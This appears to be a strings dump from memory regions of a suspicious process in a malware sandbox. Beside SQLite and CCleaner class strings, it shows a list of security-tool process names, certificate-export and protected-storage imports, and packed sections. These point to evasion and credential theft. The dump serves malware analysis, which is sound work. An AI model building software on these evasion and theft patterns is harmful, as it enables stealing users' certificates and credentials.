failed memory resize %u to %u bytes
922337203685477580
API call with %s database connection pointer
RowKey
GetProcessHeap
os_win.c:%d: (%lu) %s(%s) - %s
delayed %dms for lock/sharing conflict
%s-shm
%s%s%s
recovered %d pages from %s
recovered %d frames from WAL file %s
cannot limit WAL size: %s
invalid page number %d
2nd reference to page %d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
failed to get page %d
freelist leaf count too big on page %d
Page %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
unknown database %s
keyinfo(%d
%s(%d)
%s-mjXXXXXX9XXz
MJ delete: %s
MJ collide: %s
-mjX9X
foreign key constraint failed
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
abort at %d in [%s]: %s
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
database table is locked: %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open virtual table: %s
cannot open view: %s
no such column: "%s"
foreign key
indexed
cannot open %s column for writing
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s
%s: %s
%s prohibited in partial index WHERE clauses
%s prohibited in CHECK constraints
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
%.*s"%w"%s
%s%.*s"%w"
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_parent
%s OR name=%Q
type='trigger' AND (%s)
sqlite_
table %s may not be altered
there is already another table or index with this name: %s
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
Cannot add a PRIMARY KEY column
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
sqlite_stat1
sqlite_stat3
sqlite_stat4
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
invalid name: "%s"
too many attached databases - max %d
database %s is already in use
unable to open database: %s
no such database: %s
cannot detach database %s
database %s is locked
sqlite_detach
sqlite_attach
%s %T cannot reference objects in database %s
%s cannot use variables
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
there is already an index named %s
too many columns on %s
duplicate column name: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
cannot create a TEMP index on non-TEMP table "%s"
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
indexed columns are not unique
table %s may not be indexed
views may not be indexed
virtual tables may not be indexed
there is already a table named %s
index %s already exists
sqlite_autoindex_%s_%d
table %s has no column named %s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
unable to identify the object to be reindexed
no such collation sequence: %s
table %s may not be modified
cannot modify %s because it is a view
sqlite_version
sqlite_source_id
sqlite_log
sqlite_compileoption_used
sqlite_compileoption_get
foreign key mismatch - "%w" referencing "%w"
table %S has %d columns but %d values were supplied
%d values for %d columns
table %S has no column named %s
%s.%s may not be NULL
constraint %s failed
PRIMARY KEY must be unique
sqlite3_extension_init
%s.%s
unable to open shared library [%s]
sqlite3_
no entry point [%s] in shared library [%s]
error during initialization: %s
automatic extension loading failed: %s
defer_foreign_keys
foreign_key_check
foreign_key_list
foreign_keys
*** in database %s ***
unsupported encoding: %s
malformed database schema (%s)
%s - %s
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s:%d
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before

GoogleUpdate.exe_2512_rwx_00428000_001A1000:




.text
.data
.idata
.reloc
.edata
.xyCS5F
w..BI"[
O@e3F.AYW%
MES.uX
r.GOf{
ha.SS|`6
@!.TZ]8
GpP*.tJ!U&,
0c~Ngx]o;l|v1Sd3.EU)px_X ZW_@
5cÊ
\%sfx<
x;.DF&
.kQxlR-uslf&N|=7
rF.clIJ1
KERNEL32.dll
CRTDLL.DLL
7$80858{9
5!5/555~5
4-494?4\4|4
kkqvx_.dll
.rdata
@.data
.pdata
@.idata
T.WM9
%D,3G
.VK <
3%*"!2 2
.NSmm
L:\LADy6t=6\
cM5`CMd}GIf
X&jO>hcopo2%D,kEENFH|k
*:K.GT=`A
: '#75~8
(727 =5)
MAXB^q.eTLnzrlrA(mm: .*_
/uAKncxhy>.sm
cmDWAgyb}kq cKf-FEgSJm~bXkv|L
11,U~5.cd{BBOPQ&IRJho~r8pOL`)_FAMHu(U[se~ws4 -
].syce$|Ibn
YFA%UGvhlmr
5.kk2
dUnmcz5.Tc)LZRMSta][.
#.UbhOCC
v"#R|e&P[|i^OMvR$*rIf_qwq.yz
=(<:-71(
//#.9~!/#
%%u'SzJ
Òp(#e?[bgI
OlPI87.eqGGgb
].%-%8xm
kkqvx_64.dll
.vmp0
sfc_os.dll
32RegSetKeySecurity
00RegOpenKeyExA
02RegCreateKeyExA
04RegCloseKey
31RegEnumKeyExA
advapi32.dll
$%s%s\
%s%s\
22EnumDesktopWindows
buser32.dll
2.exe
sfc.dll
Osfc.dll
|MSASCui.exe|msseces.exe|Tcpview.exe|
crtdll.dll
Qrsvp.exe
chrome.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
47PeekNamedPipe
09WinExec
48CreatePipe
pstorec.dll
$%s_%u
%s\%s
ole32.dll
 oleaut32.dll
CertFreeCertificateContext
CryptFindCertificateKeyProvInfo
(CertOpenSystemStoreA
bCertEnumCertificatesInStore
CertAddCertificateContextToStore
RCertGetNameStringA
CertOpenStore
CertCloseStore
PFXExportCertStore
crypt32.dll
shell32.dll

%original file name%.exe_3308_rwx_007B0000_00025000:




unknown operation
large file support is disabled
unknown database: %s
no such %s mode: %s
%s mode not allowed: %s
no such vfs: %s
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
.?AV?$CKeyboardFocusImpl@VCCleanerListViewImpl@@@Piriform@@
.?AV?$CKeyboardFocusImpl@VCFilterComboCtrl@@@Piriform@@
.?AV?$CKeyboardFocusImpl@VCButtonEx@Piriform@@@Piriform@@
.?AV?$CKeyboardFocusImpl@VCCustomComboBox@Piriform@@@Piriform@@
.?AV?$CKeyboardFocusImpl@VCCheckListViewCtrlEx@Piriform@@@Piriform@@
.?AV?$bind_t@XV?$mf1@XV?$CCookiesEventsExAsync@VCIntelligentCookieScan@@UICookiesEventsEx@Piriform@@@Piriform@@V?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@@_mfi@boost@@V?$list2@V?$value@PAV?$CCookiesEventsExAsync@VCIntelligentCookieScan@@UICookiesEventsEx@Piriform@@@Piriform@@@_bi@boost@@V?$value@V?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@@23@@_bi@3@@_bi@boost@@
.?AV?$CKeyboardFocusImpl@VCRegistryListViewImpl@Piriform@@@Piriform@@
.?AV?$bind_t@XV?$mf1@XV?$ICookiesEventsExAsyncImpl@VCOptionsCookiesCtrl@@UICookiesEventsEx@Piriform@@@Piriform@@V?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@@_mfi@boost@@V?$list2@V?$value@PAV?$ICookiesEventsExAsyncImpl@VCOptionsCookiesCtrl@@UICookiesEventsEx@Piriform@@@Piriform@@@_bi@boost@@V?$value@V?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@@23@@_bi@3@@_bi@boost@@
.?AV?$CKeyboardFocusImpl@VCStartUpListViewImpl@@@Piriform@@
.?AV?$CKeyboardFocusImpl@VCDuplicateListViewImpl@Piriform@@@Piriform@@
.?AV?$bind_t@XV?$mf1@XV?$IEventsExImpl@VCToolsDuplicateCtrl@@UIDuplicateEvents@Piriform@@@Piriform@@PB_W@_mfi@boost@@V?$list2@V?$value@PAV?$IDuplicateEventsAsyncImpl@VCToolsDuplicateCtrl@@UIDuplicateEvents@Piriform@@@Piriform@@@_bi@boost@@V?$value@V?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@@23@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf1@XV?$IDuplicateEventsExImpl@VCToolsDuplicateCtrl@@UIDuplicateEvents@Piriform@@@Piriform@@PB_W@_mfi@boost@@V?$list2@V?$value@PAV?$IDuplicateEventsAsyncImpl@VCToolsDuplicateCtrl@@UIDuplicateEvents@Piriform@@@Piriform@@@_bi@boost@@V?$value@V?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@@23@@_bi@3@@_bi@boost@@
.?AV?$CKeyboardFocusImpl@VCSystemAnalyzerFilesListViewImpl@Piriform@@@Piriform@@
.?AV?$bind_t@XV?$mf1@XV?$IEventsExImpl@VCToolsSystemAnalyzerCtrl@@UISystemAnalyzerEvents@Piriform@@@Piriform@@PB_W@_mfi@boost@@V?$list2@V?$value@PAV?$ISystemAnalyzerEventsAsyncImpl@VCToolsSystemAnalyzerCtrl@@UISystemAnalyzerEvents@Piriform@@@Piriform@@@_bi@boost@@V?$value@V?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@@23@@_bi@3@@_bi@boost@@
.?AV?$CKeyboardFocusImpl@VCSystemRestoreListView@@@Piriform@@
.?AV?$CKeyboardFocusImpl@VCUninstallListViewImpl@@@Piriform@@
.?AUIWebControlEvents@@
.?AU?$forward_to_logger@U?$return_str@U?$cache_string_one_str@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@optimize@logging@boost@@V?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@ostream_like@gather@logging@boost@@U?$ts_write@U?$format_write@U?$base@Udefault_@logging@boost@@U123@@formatter@logging@boost@@U1destination@34@Ulock_resource@default_types@34@U?$simple@U?$cache_string_one_str@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@optimize@logging@boost@@@format_and_write@34@U?$simple@U?$base@Udefault_@logging@boost@@U123@@formatter@logging@boost@@U1destination@34@Ulock_resource@default_types@34@@msg_route@34@V?$shared_ptr_holder@U?$base@Udefault_@logging@boost@@U123@@formatter@logging@boost@@Vmutex_win32@threading@34@@array@34@V?$shared_ptr_holder@U?$base@Udefault_@logging@boost@@U123@@destination@logging@boost@@Vmutex_win32@threading@34@@array@34@@writer@logging@boost@@@writer@45@@logging@boost@@
.?AU?$common_base_holder@U?$return_str@U?$cache_string_one_str@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@optimize@logging@boost@@V?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@ostream_like@gather@logging@boost@@U?$ts_write@U?$format_write@U?$base@Udefault_@logging@boost@@U123@@formatter@logging@boost@@U1destination@34@Ulock_resource@default_types@34@U?$simple@U?$cache_string_one_str@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@optimize@logging@boost@@@format_and_write@34@U?$simple@U?$base@Udefault_@logging@boost@@U123@@formatter@logging@boost@@U1destination@34@Ulock_resource@default_types@34@@msg_route@34@V?$shared_ptr_holder@U?$base@Udefault_@logging@boost@@U123@@formatter@logging@boost@@Vmutex_win32@threading@34@@array@34@V?$shared_ptr_holder@U?$base@Udefault_@logging@boost@@U123@@destination@logging@boost@@Vmutex_win32@threading@34@@array@34@@writer@logging@boost@@@writer@45@@detail@logging@boost@@
.?AU?$logger_base@U?$return_str@U?$cache_string_one_str@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@optimize@logging@boost@@V?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@ostream_like@gather@logging@boost@@U?$ts_write@U?$format_write@U?$base@Udefault_@logging@boost@@U123@@formatter@logging@boost@@U1destination@34@Ulock_resource@default_types@34@U?$simple@U?$cache_string_one_str@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@optimize@logging@boost@@@format_and_write@34@U?$simple@U?$base@Udefault_@logging@boost@@U123@@formatter@logging@boost@@U1destination@34@Ulock_resource@default_types@34@@msg_route@34@V?$shared_ptr_holder@U?$base@Udefault_@logging@boost@@U123@@formatter@logging@boost@@Vmutex_win32@threading@34@@array@34@V?$shared_ptr_holder@U?$base@Udefault_@logging@boost@@U123@@destination@logging@boost@@Vmutex_win32@threading@34@@array@34@@writer@logging@boost@@@writer@45@Uoverride@45@@logging@boost@@
.?AU?$logger@U?$return_str@U?$cache_string_one_str@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@optimize@logging@boost@@V?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@ostream_like@gather@logging@boost@@U?$ts_write@U?$format_write@U?$base@Udefault_@logging@boost@@U123@@formatter@logging@boost@@U1destination@34@Ulock_resource@default_types@34@U?$simple@U?$cache_string_one_str@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@optimize@logging@boost@@@format_and_write@34@U?$simple@U?$base@Udefault_@logging@boost@@U123@@formatter@logging@boost@@U1destination@34@Ulock_resource@default_types@34@@msg_route@34@V?$shared_ptr_holder@U?$base@Udefault_@logging@boost@@U123@@formatter@logging@boost@@Vmutex_win32@threading@34@@array@34@V?$shared_ptr_holder@U?$base@Udefault_@logging@boost@@U123@@destination@logging@boost@@Vmutex_win32@threading@34@@array@34@@writer@logging@boost@@@writer@45@@logging@boost@@
.?AVHexEncoder@CryptoPP@@
.PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.PB_W
.?AV?$IOperationImpl@UISecureDelete2@IO@Piriform@@@Piriform@@
.?AV?$sp_counted_impl_p@UWebNavigate@Shell@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCWindowsServicesRule@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerPreviousWindowsInstallation@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerWindowsEventLogs@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerNetworkPasswords@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerChromeLastDownloadLocation@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerChromeFlashCookies@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerChromeCompactDatabases@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerChromeSession@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerChromeSavedPasswords@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerChromeFormHistory@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerChromeDownload@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerChromeHistory@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerChromeCookies@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerChromeCache@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerSafariSavedPasswords@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@V?$RuleBase@VCCleanerChromeCompactDatabases@Piriform@@@Opera@Rules@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@V?$RuleBase@VCCleanerChromeFormHistory@Piriform@@@Opera@Rules@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@V?$RuleBase@VCCleanerChromeDownload@Piriform@@@Opera@Rules@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@V?$RuleBase@VCCleanerChromeCookies@Piriform@@@Opera@Rules@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@V?$RuleBase@VCCleanerChromeHistory@Piriform@@@Opera@Rules@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerOperaSession@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerOperaRecentlyTypedUrls@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerOperaLastDownloadLocation@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerOperaSavedPasswords@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerOperaWebsiteIcons@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerOperaCookies@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerOperaHistory@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerOperaCache@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerMozillaSitePreferences@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerMozillaCompactDatabases@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerMozillaGoogleToolbar@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerMozillaSession@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerMozillaSavedPasswords@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerMozillaFormHistory@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerMozillaCookies@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerMozillaDownload@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerMozillaHistory@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerMozillaCache@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCCleanerIESavedPasswords@Piriform@@@detail@boost@@
.?AUISQLiteEvents@Piriform@@
.?AVCCleanerChromeCookies@Piriform@@
.?AV?$RuleBase@VCCleanerChromeCookies@Piriform@@@Opera@Rules@Piriform@@
.?AVCCleanerChromeCompactDatabases@Piriform@@
.?AV?$RuleBase@VCCleanerChromeCompactDatabases@Piriform@@@Opera@Rules@Piriform@@
.?AVCCleanerChromeFormHistory@Piriform@@
.?AV?$RuleBase@VCCleanerChromeFormHistory@Piriform@@@Opera@Rules@Piriform@@
.?AVCCleanerChromeDownload@Piriform@@
.?AV?$RuleBase@VCCleanerChromeDownload@Piriform@@@Opera@Rules@Piriform@@
.?AVCCleanerChromeHistory@Piriform@@
.?AV?$RuleBase@VCCleanerChromeHistory@Piriform@@@Opera@Rules@Piriform@@
.?AV?$sp_counted_impl_p@VCppSQLite3DB@@@detail@boost@@
.?AVCppSQLite3Exception@@
.?AV?$sp_counted_impl_p@URuleKeyInfo@Piriform@@@detail@boost@@
.?AVCRegKey@ATL@@
.?AVCRegKeyEx@Registry@Piriform@@
.?AV?$sp_counted_impl_p@VCOperaStartUpManager@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCChromeStartUpManager@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCMozillaStartUpManager@Piriform@@@detail@boost@@
.?AVCEnumRegKey@Registry@Piriform@@
.?AV?$sp_counted_impl_p@VCOperaSuperCookies@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCWindowsEventManager@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCOperaOfflineCacheCookies@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCMozillaOfflineCacheCookies@Piriform@@@detail@boost@@
.?AVCCleanerPreviousWindowsInstallation@Piriform@@
.?AVCCleanerSafariSavedPasswords@Piriform@@
.?AVCCleanerMozillaCompactDatabases@Piriform@@
.?AVCCleanerWindowsEventLogs@Piriform@@
.?AVCCleanerNetworkPasswords@Piriform@@
.?AVCCleanerChromeFlashCookies@Piriform@@
.?AVCCleanerChromeSession@Piriform@@
.?AVCCleanerChromeSavedPasswords@Piriform@@
.?AVCCleanerChromeLastDownloadLocation@Piriform@@
.?AVCCleanerChromeCache@Piriform@@
.?AVCCleanerMozillaCache@Piriform@@
.?AVCCleanerMozillaCacheBase@Piriform@@
.?AVCCleanerIESavedPasswords@Piriform@@
.?AVCCleanerOperaCookies@Piriform@@
.?AVCCleanerOperaWebsiteIcons@Piriform@@
.?AVCCleanerOperaSavedPasswords@Piriform@@
.?AVCCleanerOperaRecentlyTypedUrls@Piriform@@
.?AVCCleanerOperaLastDownloadLocation@Piriform@@
.?AVCCleanerOperaSession@Piriform@@
.?AVCCleanerOperaHistory@Piriform@@
.?AVCCleanerOperaCache@Piriform@@
.?AVCCleanerMozillaSitePreferences@Piriform@@
.?AVCCleanerMozillaGoogleToolbar@Piriform@@
.?AVCCleanerMozillaSession@Piriform@@
.?AVCCleanerMozillaSavedPasswords@Piriform@@
.?AVCCleanerMozillaFormHistory@Piriform@@
.?AVCCleanerMozillaCookies@Piriform@@
.?AVCCleanerMozillaDownload@Piriform@@
.?AVCCleanerMozillaHistory@Piriform@@
.?AVCWindowsServicesRule@Piriform@@
.?AV?$sp_counted_impl_p@VCppSQLite3Query@@@detail@boost@@
.?AVCChromeStorageDatabases@Piriform@@
.?AVCChromeSuperCookies@Piriform@@
.?AVCChromeCookies@Piriform@@
.?AV?$sp_counted_impl_p@UOperaOfflineCacheCookieInfo@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@UOperaSuperCookieInfo@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@UDomainEntry@COperaCookies@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VTag@Opera@Piriform@@@detail@boost@@
.?AVCOperaOfflineCacheCookies@Piriform@@
.?AVCOperaSuperCookies@Piriform@@
.?AVCOperaCookies@Piriform@@
.?AUIOperaCookies@Piriform@@
.?AUIOperaCookiesEnumerator@Piriform@@
.?AV?$sp_counted_impl_p@UMozillaCacheInfo@Piriform@@@detail@boost@@
.?AUIMozillaCacheEvents@Piriform@@
.?AVCMozillaOfflineCacheCookies@Piriform@@
.?AVCMozillaIndexedDB@Piriform@@
.?AVCMozillaCookies@Piriform@@
.?AUIMozillaCacheManager@Piriform@@
.?AV?$sp_counted_impl_p@VCMozillaPlugins@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCMozillaExtensions@Piriform@@@detail@boost@@
.?AVCMozillaStartUpManager@Piriform@@
.?AV?$sp_counted_impl_p@VCChromePlugins@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCChromeAddOns@Piriform@@@detail@boost@@
.?AVCChromeStartUpManager@Piriform@@
.?AVCOperaStartUpManager@Piriform@@
.?AVCOperaToolbar@Piriform@@
.?AVCOperaPersistentResources@Piriform@@
.?AVCOperaBookmarks@Piriform@@
.?AVCOperaDatabaseBookmarksProvider@Piriform@@
.?AVCWindowsEventManager@Piriform@@
.?AUIWindowsEventManager@Piriform@@
.?AV?$sp_counted_impl_p@VCOperaDatabaseBookmarksProvider@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCChromeJSONBookmarksProvider@Piriform@@@detail@boost@@
.?AV?$sp_counted_impl_p@VPrefsFile@Mozilla@Piriform@@@detail@boost@@
.?AVCMozillaExtensions@Piriform@@
.?AV?$sp_counted_impl_p@VPluginFile@CMozillaPlugins@Piriform@@@detail@boost@@
.?AVCMozillaPlugins@Piriform@@
.?AVCChromeAddOns@Piriform@@
.?AVCChromePlugins@Piriform@@
.?AVCChromeJSONBookmarksProvider@Piriform@@
.?AV?$CKeyboardFocusImpl@VCCheckComboBox@@@Piriform@@
.?AV?$CForwardedKeysEditT@VCWindow@ATL@@@@
.?AVCppSQLite3DB@@
.?AVCppSQLite3Statement@@
.?AVCppSQLite3Query@@
.?AV?$VariableKeyLength@$0BA@$03$0DI@$00$03$0A@@CryptoPP@@
.?AVSimpleKeyingInterface@CryptoPP@@
.?AV?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@UBlowfish_Info@2@@CryptoPP@@V12@@CryptoPP@@
.?AV?$AlgorithmImpl@V?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@UBlowfish_Info@2@@CryptoPP@@V12@@CryptoPP@@V12@@CryptoPP@@
.PAVRandomNumberGenerator@CryptoPP@@
.?AUIActivationExEvents@Piriform@@
.?AV?$bind_t@XV?$mf2@XV?$IAutoUpdateEventsAsyncImpl@VCAutoUpdateEventsMarshaller@Piriform@@UIUpdateEvents@2@@Piriform@@ABV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@_N@_mfi@boost@@V?$list3@V?$value@PAV?$IAutoUpdateEventsAsyncImpl@VCAutoUpdateEventsMarshaller@Piriform@@UIUpdateEvents@2@@Piriform@@@_bi@boost@@V?$value@V?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@@23@V?$value@_N@23@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf1@XV?$IAutoUpdateEventsAsyncImpl@VCAutoUpdateEventsMarshaller@Piriform@@UIUpdateEvents@2@@Piriform@@ABV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@@_mfi@boost@@V?$list2@V?$value@PAV?$IAutoUpdateEventsAsyncImpl@VCAutoUpdateEventsMarshaller@Piriform@@UIUpdateEvents@2@@Piriform@@@_bi@boost@@V?$value@V?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@@23@@_bi@3@@_bi@boost@@
.?AVIActivationExEventsImpl@Piriform@@
.?AUNoChannelSupport@BufferedTransformation@CryptoPP@@
.?AVInvalidKeyLength@CryptoPP@@
.PAV?$basic_istream@DU?$char_traits@D@std@@@std@@
.PAV?$basic_ostream@DU?$char_traits@D@std@@@std@@
.?AV?$VariableKeyLength@$0BA@$0BA@$0CA@$07$03$0A@@CryptoPP@@
.?AV?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@
.?AV?$AlgorithmImpl@V?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@V12@@CryptoPP@@
.?AUAMFUnsupportedItem@SolApi@@
.?AV?$sp_counted_impl_pd@PAUAMFUnsupportedItem@SolApi@@V?$sp_ms_deleter@UAMFUnsupportedItem@SolApi@@@detail@boost@@@detail@boost@@
.?AV?$sp_ms_deleter@UAMFUnsupportedItem@SolApi@@@detail@boost@@

%original file name%.exe_3308_rwx_00B45000_001A1000:




.text
.data
.idata
.reloc
.edata
.xyCS5F
w..BI"[
O@e3F.AYW%
MES.uX
r.GOf{
ha.SS|`6
@!.TZ]8
GpP*.tJ!U&,
0c~Ngx]o;l|v1Sd3.EU)px_X ZW_@
5cÊ
\%sfx<
x;.DF&
.kQxlR-uslf&N|=7
rF.clIJ1
KERNEL32.dll
CRTDLL.DLL
7$80858{9
5!5/555~5
4-494?4\4|4
kkqvx_.dll
.rdata
@.data
.pdata
@.idata
T.WM9
%D,3G
.VK <
3%*"!2 2
.NSmm
L:\LADy6t=6\
cM5`CMd}GIf
X&jO>hcopo2%D,kEENFH|k
*:K.GT=`A
: '#75~8
(727 =5)
